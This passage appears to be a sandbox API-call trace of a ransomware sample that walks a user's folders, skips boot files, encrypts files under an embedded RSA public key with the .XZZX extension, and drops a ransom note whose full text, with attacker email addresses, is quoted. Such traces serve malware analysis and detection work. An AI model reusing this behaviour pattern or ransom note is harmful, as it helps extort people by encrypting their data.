-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.608] lstrcpyW (in: lpString1=0x17be7c, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0111.608] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x488 [0111.609] Sleep (dwMilliseconds=0x96) [0111.764] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.764] lstrcmpW (lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpString2="..") returned 1 [0111.764] lstrcmpW (lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpString2=".") returned 1 [0111.764] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0111.764] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="ntldr") returned 0x0 [0111.764] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="NTLDR") returned 0x0 [0111.764] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0111.764] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0111.764] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0111.764] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.764] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0111.764] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.764] lstrcpyW (in: lpString1=0x17be7c, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0111.764] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x48c [0111.765] Sleep (dwMilliseconds=0x96) [0111.920] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.920] lstrcmpW (lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpString2="..") returned 1 [0111.920] lstrcmpW (lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpString2=".") returned 1 [0111.920] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0111.920] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="ntldr") returned 0x0 [0111.920] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="NTLDR") returned 0x0 [0111.920] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0111.920] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0111.920] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0111.920] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.920] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0111.920] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.920] lstrcpyW (in: lpString1=0x17be7c, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0111.920] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x490 [0111.921] WaitForSingleObject (hHandle=0x490, dwMilliseconds=0xffffffff) returned 0x0 [0111.922] Sleep (dwMilliseconds=0x96) [0112.076] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.076] lstrcmpW (lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpString2="..") returned 1 [0112.076] lstrcmpW (lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpString2=".") returned 1 [0112.076] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0112.076] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="ntldr") returned 0x0 [0112.076] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="NTLDR") returned 0x0 [0112.076] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0112.076] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="ntdetect.com") returned 0x0 [0112.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0112.076] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0112.076] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0112.076] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.076] lstrcpyW (in: lpString1=0x17be7c, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0112.076] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0112.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x494 [0112.077] Sleep (dwMilliseconds=0x96) [0112.232] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.232] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0112.232] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0112.232] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0112.232] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0112.232] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0112.233] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0112.234] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0112.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0112.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0112.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0112.234] SetErrorMode (uMode=0x1) returned 0x1 [0112.234] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT") returned 74 [0112.234] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0112.235] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0112.235] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x498) returned 0x0 [0112.235] RegQueryValueExW (in: hKey=0x498, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbb440, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cbb440*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0112.235] RegCloseKey (hKey=0x498) returned 0x0 [0112.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0112.235] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0112.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0112.236] CloseHandle (hObject=0x498) returned 1 [0112.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0112.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0112.236] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0112.236] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0112.236] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.236] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0112.237] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0112.237] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0112.237] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0112.237] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0112.237] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0112.237] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0112.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0112.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0112.237] SetErrorMode (uMode=0x1) returned 0x1 [0112.237] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0112.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.237] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0112.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0112.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0112.238] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0112.238] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.239] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.239] lstrcmpW (lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpString2="..") returned 1 [0112.239] lstrcmpW (lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpString2=".") returned 1 [0112.239] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0112.239] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="ntldr") returned 0x0 [0112.239] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="NTLDR") returned 0x0 [0112.239] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0112.239] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0112.239] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0112.239] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0112.239] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0112.239] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.239] lstrcpyW (in: lpString1=0x17be7c, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0112.239] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a0 [0112.240] Sleep (dwMilliseconds=0x96) [0112.388] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0112.388] lstrcmpW (lpString1="A58916D017654CD0CF379F2B1B923118.XZZX", lpString2="..") returned 1 [0112.388] lstrcmpW (lpString1="A58916D017654CD0CF379F2B1B923118.XZZX", lpString2=".") returned 1 [0112.388] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0112.388] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="ntldr") returned 0x0 [0112.388] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="NTLDR") returned 0x0 [0112.388] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0112.388] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="ntdetect.com") returned 0x0 [0112.388] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0112.388] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0112.388] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0112.388] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 